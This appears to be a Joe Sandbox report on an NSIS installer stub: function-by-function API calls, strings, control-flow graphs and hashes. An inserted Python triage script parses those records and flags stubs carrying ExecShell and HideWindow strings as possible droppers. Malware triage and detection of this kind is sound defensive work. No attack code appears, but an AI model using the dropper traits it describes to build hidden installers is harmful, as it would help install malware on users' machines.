                                                    • Inst, xrefs: 0040366C
                                                    • Error launching installer, xrefs: 004035D7
                                                    • soft, xrefs: 00403675
                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                    • API String ID: 4283519449-527102705
                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                    Control-flow Graph

                                                    control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                    • wsprintfW.USER32 ref: 004034A4
                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CountFileTickWrite$wsprintf
                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                    • API String ID: 651206458-1535804072
                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                    Control-flow Graph

                                                    control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                    APIs
                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2740478559-0
                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                    Control-flow Graph

                                                    control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                    APIs
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GlobalFree.KERNELBASE(005CE5F8), ref: 00402387
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FreeGloballstrcpyn
                                                    • String ID: %SenateRoof%$Exch: stack < %d elements$Pop: stack empty
                                                    • API String ID: 1459762280-1304504562
                                                    • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                    • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                    Control-flow Graph

                                                    control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                    • GlobalFree.KERNELBASE(005CE5F8), ref: 00402387
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                    • String ID:
                                                    • API String ID: 3376005127-0
                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                    Control-flow Graph

                                                    control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                    • String ID:
                                                    • API String ID: 2568930968-0
                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Control-flow Graph

Control-flow graph for the function at 00402713 (rendered graph not recoverable; blocks and edges from the graph data): 402713-40273b (call 406009 x2) -> optionally 40273d-402743 (call 40145c) -> 402746-402749 -> optionally 40274b-402752 (call 40145c) -> 402755-402758 -> optionally 40275a-402761 (call 40145c) -> 402764-40278c (call 40145c, call 4062a3, WritePrivateProfileStringW). Each optional block resolves one string argument before the INI write.
                                                    APIs
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                    • String ID: %SenateRoof%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                    • API String ID: 247603264-2402012953
                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Control-flow Graph

Control-flow graph for the function at 004021B5 (rendered graph not recoverable; blocks and edges from the graph data): 4021b5-40220b (call 40145c x4, call 404f72, ShellExecuteW) -> either 402223-4030f2 (call 4062a3, logs the ExecShell success string) or 40220d-40221b (call 4062a3, logs the ExecShell error string) -> 402223.
                                                    APIs
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                    • API String ID: 3156913733-2180253247
                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: nsa
                                                    • API String ID: 1716503409-2209301699
                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                    APIs
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                    • String ID: HideWindow
                                                    • API String ID: 1249568736-780306582
                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
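The records above give the NSIS stub's per-function API calls and the log-format strings its instruction handlers carry (ExecShell, WriteINIStr, RMDir, HideWindow, "NSIS Error", and the "nsa" prefix passed to GetTempFileNameW with uUnique = 0, which yields names of the form nsa<hex>.tmp). Below is an added example, not part of the Joe Sandbox report and not code from the sample: a Python helper that parses lines in the report's "APIs" format, scans a buffer for those strings in both ASCII and UTF-16LE (the stub is a Unicode build, hence the W-suffixed imports), and locates nsa<hex>.tmp names. The buffer it runs on is constructed, not real dump data, the API lines are copied from the GetTempFileNameW and WriteINIStr records, and the ExecShell + HideWindow verdict is a heuristic of my own, not a Joe Sandbox signature.

```python
"""NSIS-stub triage helpers derived from the function records (added example)."""
import re
from typing import Dict, List, NamedTuple, Optional

# Copied from the "String ID" fields of the records; searched as ASCII and UTF-16LE.
MARKERS = {
    "nsis_error": "NSIS Error",
    "write_ini": "WriteINIStr: wrote [%s] %s=%s in %s",
    "exec_shell_ok": 'ExecShell: success ("%s": file:"%s" params:"%s")',
    "exec_shell_err": 'ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d',
    "rmdir": 'RMDir: RemoveDirectory("%s")',
    "hide_window": "HideWindow",
}

# One "APIs" line: optional bullet, optional "Part of subcall function XXXX:",
# Api.MODULE(args) or Api.MODULE without an argument list, then ", ref: ADDR".
API_LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[str]         # raw argument column; "?" = unresolved by the sandbox
    ref: int                # address of the call instruction
    subcall: Optional[int]  # callee address when the line is "Part of subcall"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse one record's API list. Splitting on commas is adequate for the
    sandbox output, whose string arguments carry no commas."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE_RE.match(line)
        if not m:
            continue
        sub, api, mod, args, ref = m.groups()
        arglist = [a.strip() for a in args.split(",")] if args else []
        calls.append(ApiCall(api, mod, arglist, int(ref, 16), int(sub, 16) if sub else None))
    return calls


def direct_apis(calls: List[ApiCall]) -> List[str]:
    """APIs the function calls itself, excluding those attributed to subcalls."""
    return [c.api for c in calls if c.subcall is None]


def find_markers(blob: bytes) -> Dict[str, List[int]]:
    """Marker name -> offsets of every ASCII or UTF-16LE occurrence in blob."""
    hits: Dict[str, List[int]] = {}
    for name, text in MARKERS.items():
        offsets: List[int] = []
        for enc in ("ascii", "utf-16-le"):
            needle, start = text.encode(enc), 0
            while (pos := blob.find(needle, start)) != -1:
                offsets.append(pos)
                start = pos + 1
        if offsets:
            hits[name] = sorted(offsets)
    return hits


# GetTempFileNameW(path, "nsa", 0, buf) produces <pre><uuuu>.TMP with up to four
# hex digits; match that shape in both encodings.
_TEMP_RES = (
    re.compile(rb"nsa[0-9A-Fa-f]{1,4}\.tmp", re.IGNORECASE),
    re.compile(rb"n\x00s\x00a\x00(?:[0-9A-Fa-f]\x00){1,4}\.\x00t\x00m\x00p\x00", re.IGNORECASE),
)


def find_temp_names(blob: bytes) -> List[str]:
    names: List[str] = []
    for rx in _TEMP_RES:
        for m in rx.finditer(blob):
            raw = m.group(0)
            names.append(raw.decode("utf-16-le" if b"\x00" in raw else "ascii"))
    return names


def classify(blob: bytes) -> str:
    """Heuristic (my own, not a sandbox signature): is this an NSIS stub, and does
    it carry both the ExecShell and HideWindow strings, i.e. the instructions a
    dropper uses to launch a file with the installer window hidden."""
    hits = find_markers(blob)
    if "nsis_error" not in hits and not find_temp_names(blob):
        return "not-nsis"
    if {"exec_shell_ok", "hide_window"} <= set(hits):
        return "nsis-execshell-hidden"
    return "nsis-stub"


# Constructed stand-in for a dump (not real sample data): a few stub strings plus one temp path.
SAMPLE_BLOB = b"".join([
    b"\x00" * 16,
    "NSIS Error".encode("utf-16-le"), b"\x00" * 8,
    MARKERS["exec_shell_ok"].encode("utf-16-le"), b"\x00" * 4,
    "HideWindow".encode("utf-16-le"), b"\x00" * 4,
    r"C:\Users\user\AppData\Local\Temp\nsa1A2B.tmp".encode("utf-16-le"),
    b"\x00" * 16,
])

# API lines copied from the report's GetTempFileNameW and WriteINIStr records.
RECORD_EXAMPLE = """APIs
• GetTickCount.KERNEL32 ref: 00405E9D
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
"""
```

Running parse_api_lines(RECORD_EXAMPLE) yields three ApiCall tuples, with the lstrcpynW call attributed to subcall 00406009 and the third GetTempFileNameW argument (uUnique) resolved as 00000000; classify(SAMPLE_BLOB) returns "nsis-execshell-hidden" and find_temp_names(SAMPLE_BLOB) returns ["nsa1A2B.tmp"]. The temp-name pattern is the part worth reusing in a file-creation detection on %TEMP%, since the stub forms the name before any payload is written.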
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
